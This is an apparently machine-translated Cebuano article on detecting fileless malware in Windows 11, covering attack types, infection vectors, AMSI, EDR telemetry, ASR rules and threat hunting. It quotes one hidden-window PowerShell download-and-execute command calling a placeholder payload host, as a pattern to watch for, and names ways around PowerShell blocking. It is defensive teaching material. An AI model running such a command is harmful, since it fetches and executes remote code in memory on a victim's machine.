Giunsa mahibal-an ang peligro nga fileless malware sa Windows 11

¿Giunsa mahibal-an ang peligro nga fileless malware? Ang walay file nga pag-atake nga kalihokan miuswag pag-ayo, ug sa paghimo sa mga butang nga mas grabe, Ang Windows 11 dili immuneKini nga pamaagi nag-bypasses sa disk ug nagsalig sa memorya ug mga lehitimong himan sa sistema; mao nga naglisud ang mga programa sa antivirus nga nakabase sa pirma. Kung nangita ka usa ka kasaligan nga paagi aron mahibal-an kini, ang tubag naa sa paghiusa telemetry, pagtuki sa pamatasan, ug mga kontrol sa Windows.

Sa kasamtangan nga ekosistema, ang mga kampanya nga nag-abuso sa PowerShell, WMI, o Mshta nag-uban sa mas sopistikado nga mga teknik sama sa memory injection, pagpadayon "nga walay paghikap" sa disk, ug bisan pa. mga pag-abuso sa firmwareAng yawe mao ang pagsabut sa mapa sa hulga, ang mga hugna sa pag-atake, ug unsa nga mga signal ang ilang gibiyaan bisan kung ang tanan mahitabo sa sulod sa RAM.

Unsa ang fileless malware ug nganong nabalaka kini sa Windows 11?

Kung maghisgot kami bahin sa mga "fileless" nga mga hulga, among gipasabut ang malisyosong code nga Dili nimo kinahanglan nga magdeposito og bag-ong mga executable sa file system aron molihok. Kasagaran kini gi-inject sa mga proseso nga nagdagan ug gipatuman sa RAM, nagsalig sa mga tighubad ug binary nga gipirmahan sa Microsoft (pananglitan, PowerShell, WMI, rundll32, mshtaGipamenos niini ang imong footprint ug gitugotan ka sa pag-bypass sa mga makina nga mangita lang sa mga kadudahang file.

Bisan ang mga dokumento sa opisina o mga PDF nga nagpahimulos sa mga kahuyangan sa paglansad sa mga mando giisip nga bahin sa panghitabo, tungod kay i-activate ang execution sa memorya nga wala magbilin ug mapuslanong binary para sa pagtuki. Pag-abuso sa macros ug DDE Sa Opisina, tungod kay ang code nagdagan sa mga lehitimong proseso sama sa WinWord.

Gikombinar sa mga tig-atake ang social engineering (phishing, spam links) uban ang teknikal nga mga lit-ag: ang pag-klik sa user nagsugod sa usa ka kadena diin ang usa ka script nag-download ug nagpatuman sa katapusang payload sa memorya, paglikay sa pagbiya sa usa ka pagsubay sa disk. Ang mga katuyoan gikan sa pagpangawat sa datos hangtod sa pagpatuman sa ransomware, hangtod sa hilom nga paglihok sa kilid.

Mga tipolohiya pinaagi sa tunob sa sistema: gikan sa 'puro' hangtod sa mga hybrid

Aron malikayan ang makalibog nga mga konsepto, makatabang ang pagbulag sa mga hulga pinaagi sa ilang lebel sa interaksyon sa file system. Kini nga pagkategorya nagpatin-aw unsa ang nagpadayon, diin nagpuyo ang code, ug unsa nga mga timailhan ang nahabilin niini?.

Type I: walay kalihokan sa file

Ang bug-os nga fileless malware wala magsulat sa disk. Usa ka klasiko nga pananglitan mao ang pagpahimulos sa a pagkahuyang sa network (sama sa EternalBlue vector balik sa adlaw) aron ipatuman ang usa ka backdoor nga nagpuyo sa kernel memory (mga kaso sama sa DoublePulsar). Dinhi, ang tanan mahitabo sa RAM ug walay mga artifact sa file system.

Ang laing kapilian mao ang pagkontaminar sa firmware sa mga component: BIOS/UEFI, network adapters, USB peripheral (BadUSB-type nga mga teknik) o bisan CPU subsystems. Nagpadayon sila pinaagi sa pag-restart ug pag-instalar, uban ang dugang nga kalisud Pipila ka mga produkto ang nagsusi sa firmwareKini mga komplikado nga pag-atake, dili kaayo kanunay, apan peligro tungod sa ilang pagkatago ug kalig-on.

Type II: Dili direkta nga kalihokan sa pag-archive

Dinhi, ang malware dili "mobiya" sa kaugalingon nga ma-executable, apan naggamit sa mga sulud nga gidumala sa sistema nga hinungdanon nga gitipigan ingon mga file. Pananglitan, ang mga backdoor nga tanum mga sugo sa powershell sa WMI repository ug i-trigger ang pagpatuman niini gamit ang mga filter sa panghitabo. Posible nga i-install kini gikan sa command line nga dili ihulog ang mga binary, apan ang WMI repository nagpuyo sa disk isip usa ka lehitimong database, nga nagpalisud sa paglimpyo nga dili makaapekto sa sistema.

Gikan sa usa ka praktikal nga punto sa panglantaw sila giisip nga walay file, tungod kay kana nga sudlanan (WMI, Registry, ug uban pa) Dili kini usa ka klasiko nga makit-an nga ma-executable Ug ang paglimpyo niini dili gamay. Ang resulta: tago nga pagpadayon nga adunay gamay nga "tradisyonal" nga pagsubay.

Type III: Nagkinahanglan og mga file aron molihok

Ang ubang mga kaso nagpadayon sa usa ka 'walay file' nga pagpadayon Sa lohikal nga lebel, kinahanglan nila ang usa ka file-based trigger. Ang kasagaran nga pananglitan mao ang Kovter: kini nagrehistro sa usa ka shell verb alang sa usa ka random extension; kung giablihan ang usa ka file nga adunay kana nga extension, usa ka gamay nga script gamit ang mshta.exe gilansad, nga nagtukod pag-usab sa malisyosong string gikan sa Registry.

Ang lansis mao nga kini nga mga "paon" nga mga file nga adunay random nga mga extension wala maglangkob sa usa ka analyzable payload, ug ang kadaghanan sa code nagpuyo sa Registro (laing sudlanan). Mao nga gi-categorize sila nga wala’y file sa epekto, bisan kung higpit nga pagsulti nagsalig sila sa usa o daghang mga artifact sa disk ingon usa ka hinungdan.

Vectors ug 'host' sa impeksyon: diin kini mosulod ug diin kini nagtago

Aron mapauswag ang pagkakita, hinungdanon nga mapa ang punto sa pagsulod ug ang host sa impeksyon. Kini nga panglantaw makatabang sa pagdesinyo piho nga mga kontrol Unaha ang angay nga telemetry.

kalamposan

• Gibase sa file (Type III): Ang mga dokumento, executable, legacy Flash/Java files, o LNK files mahimong makapahimulos sa browser o sa makina nga nagproseso niini aron makarga ang shellcode ngadto sa memorya. Ang una nga vector usa ka file, apan ang payload nagbiyahe sa RAM.
• Gibase sa network (Type I): Ang usa ka pakete nga nagpahimulos sa usa ka kahuyang (pananglitan, sa SMB) nakab-ot ang pagpatuman sa userland o kernel. Gipasikat ni WannaCry kini nga pamaagi. Direkta nga pagkarga sa memorya walay bag-ong file.

hardware

• Mga Device (Type I): Ang firmware sa disk o network card mahimong usbon ug ipaila ang code. Lisud nga susihon ug magpadayon sa gawas sa OS.
• CPU ug mga subsystem sa pagdumala (Type I): Ang mga teknolohiya sama sa ME/AMT sa Intel nagpakita sa mga agianan sa Networking ug pagpatuman sa gawas sa OSNag-atake kini sa ubos kaayo nga lebel, nga adunay taas nga potensyal nga tago.
• USB (Type I): Gitugotan ka sa BadUSB nga i-reprogram ang usa ka USB drive aron ma-ipersonate ang usa ka keyboard o NIC ug maglunsad og mga command o i-redirect ang trapiko.
• BIOS / UEFI (Type I): malisyoso nga firmware reprogramming (mga kaso sama sa Mebromi) nga nagdagan sa wala pa ang Windows boots.
• Hypervisor (Type I): Pagpatuman sa usa ka mini-hypervisor sa ilawom sa OS aron matago ang presensya niini. Talagsa ra, apan naobserbahan na sa porma sa hypervisor rootkits.

Pagpatay ug pag-injection

• Gibase sa file (Type III): EXE/DLL/LNK o naka-iskedyul nga mga buluhaton nga maglunsad og mga injection ngadto sa mga lehitimong proseso.
• Macros (Type III): Ang VBA sa Opisina makahimo sa pag-decode ug pagpatuman sa mga payload, lakip ang bug-os nga ransomware, uban ang pagtugot sa tiggamit pinaagi sa paglimbong.
• Mga Script (Type II): PowerShell, VBScript o JScript gikan sa file, command line, serbisyo, Pagrehistro o WMIMahimong i-type sa tig-atake ang script sa usa ka hilit nga sesyon nga dili mahikap ang disk.
• Boot record (MBR/Boot) (Type II): Ang mga pamilya sama ni Petya nag-overwrite sa boot sector aron makontrol sa pagsugod. Naa kini sa gawas sa file system, apan ma-access sa OS ug modernong mga solusyon nga makapabalik niini.

Giunsa paglihok ang mga pag-atake nga walay file: mga hugna ug signal

Bisan tuod wala sila magbilin ug mga executable files, ang mga kampanya nagsunod sa usa ka phased logic. Ang pagsabut niini nagtugot sa pag-monitor. mga panghitabo ug relasyon tali sa mga proseso nga nagbilin ug marka.

• Inisyal nga pag-accessMga pag-atake sa phishing gamit ang mga link o mga attachment, nakompromiso nga mga website, o gikawat nga mga kredensyal. Daghang mga kadena nagsugod sa usa ka dokumento sa Opisina nga nagpalihok sa usa ka mando PowerShell.
• Paglahutay: backdoors pinaagi sa WMI (mga filter ug subskripsyon), Mga yawe sa pagpatuman sa rehistro o naka-iskedyul nga mga buluhaton nga naglansad pag-usab sa mga script nga wala’y bag-ong malisyoso nga file.
• ExfiltrationKung makolekta na ang impormasyon, ipadala kini sa gawas sa network gamit ang kasaligang mga proseso (mga browser, PowerShell, bitsadmin) aron masagol ang trapiko.

Kini nga sumbanan labi ka malimbungon tungod kay ang mga timailhan sa pag-atake Nagtago sila sa pagka-normal: mga argumento sa command-line, pagkadena sa proseso, mga anomaliya nga outbound nga koneksyon, o pag-access sa mga API sa injection.

Kasagaran nga mga teknik: gikan sa memorya hangtod sa pagrekord

Ang mga aktor nagsalig sa usa ka hanay sa mga pamaagi nga optimize tago. Makatabang nga mahibal-an ang labing kasagaran aron ma-aktibo ang epektibo nga pagtuki.

• Residente sa memorya: Pagkarga sa mga payload sa luna sa usa ka kasaligang proseso nga naghulat sa pagpaaktibo. mga rootkit ug mga kaw-it Sa kernel, gipataas nila ang lebel sa pagtago.
• Pagpadayon sa RegistryI-save ang mga naka-encrypt nga blobs sa mga yawe ug i-rehydrate kini gikan sa usa ka lehitimong launcher (mshta, rundll32, wscript). Ang ephemeral installer mahimong makaguba sa kaugalingon aron maminusan ang tunob niini.
• Kredensyal nga phishingGamit ang kinawat nga mga username ug password, ang tig-atake mopatay ug hilit nga mga kabhang ug mga tanom hilom nga pag-access sa Registry o WMI.
• 'Walay File' RansomwareAng pag-encrypt ug C2 nga komunikasyon gi-orkestra gikan sa RAM, nga nagpamenos sa mga oportunidad sa pag-ila hangtod nga makita ang kadaot.
• Operating kits: mga automated nga kadena nga nakamatikod sa mga kahuyangan ug nag-deploy og memory-only payloads human sa pag-klik sa user.
• Mga dokumento nga adunay code: mga macro ug mga mekanismo sama sa DDE nga nag-trigger sa mga sugo nga wala magtipig sa mga executable sa disk.

Ang mga pagtuon sa industriya nagpakita na sa talagsaong mga taluktok: sa usa ka panahon sa 2018, a pagtaas sa labaw sa 90% sa script-based ug PowerShell chain attacks, usa ka timaan nga ang vector gipalabi tungod sa pagka-epektibo niini.

Ang hagit alang sa mga kompanya ug mga supplier: ngano nga ang pag-block dili igo

Makatintal nga i-disable ang PowerShell o i-ban ang mga macro hangtod sa hangtod, apan Basin nimo ang operasyonAng PowerShell usa ka haligi sa modernong administrasyon ug ang Opisina hinungdanon sa negosyo; Ang pag-block sa buta kasagaran dili mahimo.

Dugang pa, adunay mga paagi sa paglaktaw sa mga batakang kontrol: pagpadagan sa PowerShell pinaagi sa mga DLL ug rundll32, mga script sa pagputos sa mga EXE, Pagdala sa imong kaugalingong kopya sa PowerShell o bisan itago ang mga script sa mga imahe ug i-extract kini sa memorya. Busa, ang depensa dili mahimong ibase lamang sa paglimud sa pagkaanaa sa mga himan.

Ang laing kasagarang sayop mao ang pagdelegar sa tibuok desisyon ngadto sa panganod: kung ang ahente kinahanglang maghulat sa tubag gikan sa server, Nawad-an ka sa real-time nga pagpugongAng datos sa telemetry mahimong ma-upload aron mapauswag ang kasayuran, apan ang Ang pagminus kinahanglan mahitabo sa katapusan nga punto.

Giunsa mahibal-an ang fileless malware sa Windows 11: telemetry ug pamatasan

Ang diskarte sa pagdaog mao monitor sa mga proseso ug memoryaDili mga file. Ang malisyosong mga kinaiya mas lig-on kay sa mga porma nga gikuha sa usa ka file, nga naghimo niini nga maayo alang sa mga makina sa pagpugong.

• AMSI (Antimalware Scan Interface)Gipugngan niini ang mga script sa PowerShell, VBScript, o JScript bisan kung kini dinamikong gihimo sa memorya. Maayo kaayo alang sa pagkuha sa mga obfuscated string sa wala pa ipatuman.
• Pagmonitor sa proseso: pagsugod/paghuman, PID, mga ginikanan ug mga anak, mga ruta, mga linya sa mando ug mga hash, dugang mga punoan sa pagpatay aron masabtan ang tibuuk nga istorya.
• Pagtuki sa memorya: detection sa mga injection, reflective o PE load nga walay paghikap sa disk, ug pagrepaso sa dili kasagaran nga executable nga mga rehiyon.
• Pagpanalipod sa sektor sa pagsugod: kontrol ug pagpasig-uli sa MBR/EFI sa kaso sa tampering.

Sa Microsoft ecosystem, ang Defender for Endpoint naghiusa sa AMSI, pagmonitor sa pamatasanAng pag-scan sa panumduman ug ang pagkat-on sa makina nga nakabase sa panganod gigamit sa pagsukod sa mga detection batok sa bag-o o nalibog nga mga variant. Ang ubang mga tigbaligya naggamit parehas nga mga pamaagi sa mga makina nga residente sa kernel.

Realistiko nga pananglitan sa correlation: gikan sa dokumento ngadto sa PowerShell

Hunahunaa ang usa ka kadena diin ang Outlook nag-download sa usa ka attachment, gibuksan sa Word ang dokumento, gipagana ang aktibo nga sulud, ug gilusad ang PowerShell nga adunay mga kadudahang mga parameter. Ang saktong telemetry magpakita sa Linya sa pagmando (pananglitan, ExecutionPolicy Bypass, tinago nga bintana), pagkonektar sa usa ka dili kasaligan nga domain ug paghimo usa ka proseso sa bata nga nag-install sa kaugalingon sa AppData.

Ang ahente nga adunay lokal nga konteksto makahimo hunong ug balik malisyoso nga kalihokan nga walay manual interbensyon, dugang sa pagpahibalo sa SIEM o pinaagi sa email/SMS. Ang ubang mga produkto makadugang ug root cause attribution layer (StoryLine-type nga mga modelo), nga nagpunting dili sa makitang proseso (Outlook/Word), kondili sa puno nga malisyoso nga thread ug ang gigikanan niini aron hingpit nga limpyohan ang sistema.

Ang usa ka tipikal nga sumbanan sa sugo nga bantayan mahimong sama niini: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Ang lohika dili ang eksaktong pisi, apan ang set sa mga signal: policy bypass, tinago nga bintana, tin-aw nga pag-download, ug in-memory execution.

AMSI, pipeline ug papel sa matag aktor: gikan sa endpoint hangtod sa SOC

Labaw sa pagkuha sa script, usa ka lig-on nga arkitektura ang nag-orkestra sa mga lakang nga nagpadali sa imbestigasyon ug pagtubag. Ang daghang ebidensya sa dili pa ipatuman ang load, mas maayo., labing maayo.

• Script interceptionGihatud sa AMSI ang sulud (bisan kung kini gihimo sa langaw) alang sa static ug dinamikong pagtuki sa usa ka pipeline sa malware.
• Pagproseso sa mga panghitaboAng mga PID, binary, hash, ruta, ug uban pang datos gikolekta. mga argumento, pag-establisar sa proseso nga mga kahoy nga mitultol sa kataposang karga.
• Pagsusi ug pagreportAng mga detection gipakita sa product console ug gipasa ngadto sa network platforms (NDR) para sa campaign visualization.
• Mga garantiya sa tiggamitBisan kung ang usa ka script gi-inject sa memorya, ang framework Gibabagan kini sa AMSI sa compatible nga mga bersyon sa Windows.
• Mga katakus sa tagdumala: configuration sa polisiya aron makahimo sa pag-inspeksyon sa script, pag-block sa pamatasan ug paghimo og mga taho gikan sa console.
• trabaho sa SOC: pagkuha sa mga artifact (VM UUID, OS version, script type, initiator process ug ang ginikanan niini, hash ug command lines) aron mabuhat pag-usab ang kasaysayan ug mga lagda sa pagbayaw sa umaabot.

Kung gitugotan sa plataporma ang pag-eksport sa memory buffer Kauban sa pagpatay, ang mga tigdukiduki makahimo og bag-ong mga detection ug makapauswag sa depensa batok sa susamang mga variant.

Praktikal nga mga lakang sa Windows 11: paglikay ug pagpangayam

Dugang pa sa pagbaton og EDR nga adunay memory inspection ug AMSI, Windows 11 nagtugot kanimo sa pagsira sa mga luna sa pag-atake ug pagpalambo sa visibility sa lumad nga mga kontrol.

• Pagparehistro ug mga pagdili sa PowerShellMakapahimo sa Script Block Logging ug Module Logging, magamit ang mga restricted mode kung mahimo, ug makontrol ang paggamit sa Bypass/Gitago.
• Mga Lagda sa Attack Surface Reduction (ASR).: gibabagan ang paglansad sa script sa mga proseso sa Opisina ug Pag-abuso sa WMI/PSExec kung dili kinahanglan.
• Mga polisiya sa macro sa opisina: pag-disable pinaagi sa default, internal nga macro signing ug higpit nga mga lista sa pagsalig; nagmonitor sa legacy DDE flows.
• WMI Audit ug Registry: nag-monitor sa mga subskripsyon sa panghitabo ug mga awtomatikong execution key (Run, RunOnce, Winlogon), ingon man ang paghimo sa buluhaton gikatakda.
• Proteksyon sa pagsugod: nagpalihok sa Secure Boot, nagsusi sa MBR/EFI integridad ug nagpamatuod nga walay mga kausaban sa pagsugod.
• Patching ug hardening: nagsira sa mapahimuslanon nga mga kahuyangan sa mga browser, mga sangkap sa Opisina, ug mga serbisyo sa network.
• kahibalo: nagbansay sa mga tiggamit ug mga technical team sa phishing ug mga signal sa tago nga mga pagpatay.

Alang sa pagpangayam, ipunting ang mga pangutana bahin sa: paghimo sa mga proseso sa Opisina padulong sa PowerShell/MSHTA, mga argumento nga adunay downloadstring/downloadfileMga script nga adunay klaro nga obfuscation, reflective injection, ug outbound networks sa mga kadudahang TLD. Cross-reference kini nga mga signal nga adunay reputasyon ug frequency aron makunhuran ang kasaba.

Unsa ang mamatikdan sa matag makina karon?

Ang mga solusyon sa negosyo sa Microsoft naghiusa sa AMSI, pag-analisa sa pamatasan, susiha ang memorya ug proteksyon sa sektor sa boot, lakip ang mga modelo sa ML nga nakabase sa panganod aron sukdon batok sa mga mitumaw nga hulga. Ang ubang mga vendor nagpatuman sa kernel-level monitoring aron sa paglainlain sa malisyoso gikan sa benign software nga adunay awtomatik nga rollback sa mga kausaban.

Usa ka pamaagi nga gibase sa mga istorya sa pagpatay Gitugotan ka niini nga mahibal-an ang hinungdan nga hinungdan (pananglitan, usa ka pagdugtong sa Outlook nga nagpalihok sa usa ka kadena) ug maminusan ang tibuuk nga punoan: mga script, mga yawe, mga buluhaton, ug mga intermediate binary, paglikay nga maipit sa makita nga simtomas.

Kasagarang mga sayop ug unsaon paglikay niini

Ang pagbabag sa PowerShell nga wala’y alternatibo nga plano sa pagdumala dili lamang dili praktikal, apan adunay usab mga paagi sa pagtawag niini sa dili direktaAng parehas nga magamit sa mga macro: mahimo nimo kini pagdumala gamit ang mga palisiya ug pirma, o ang negosyo mag-antos. Mas maayo nga mag-focus sa telemetry ug mga lagda sa pamatasan.

Ang laing kasagarang sayop mao ang pagtuo nga ang pag-whitelist sa mga aplikasyon makasulbad sa tanan: ang walay file nga teknolohiya nagsalig sa tukma niini. kasaligan nga mga appAng kontrol kinahanglan nga mag-obserbar kung unsa ang ilang gibuhat ug kung giunsa ang ilang kalabutan, dili lang kung gitugotan sila.

Sa tanan nga naa sa ibabaw, ang walay file nga malware mohunong nga mahimong "multo" kung imong gibantayan kung unsa gyud ang hinungdanon: kinaiya, memorya, ug gigikanan sa matag pagpatay. Ang paghiusa sa AMSI, daghang proseso nga telemetry, lumad nga Windows 11 nga mga kontrol, ug usa ka layer sa EDR nga adunay pag-analisar sa pamatasan naghatag kanimo sa bentaha. Idugang sa equation nga realistiko nga mga palisiya para sa mga macro ug PowerShell, WMI/Registry auditing, ug pagpangayam nga nag-una sa command lines ug process trees, ug aduna kay depensa nga moputol niini nga mga kadena sa dili pa kini motingog.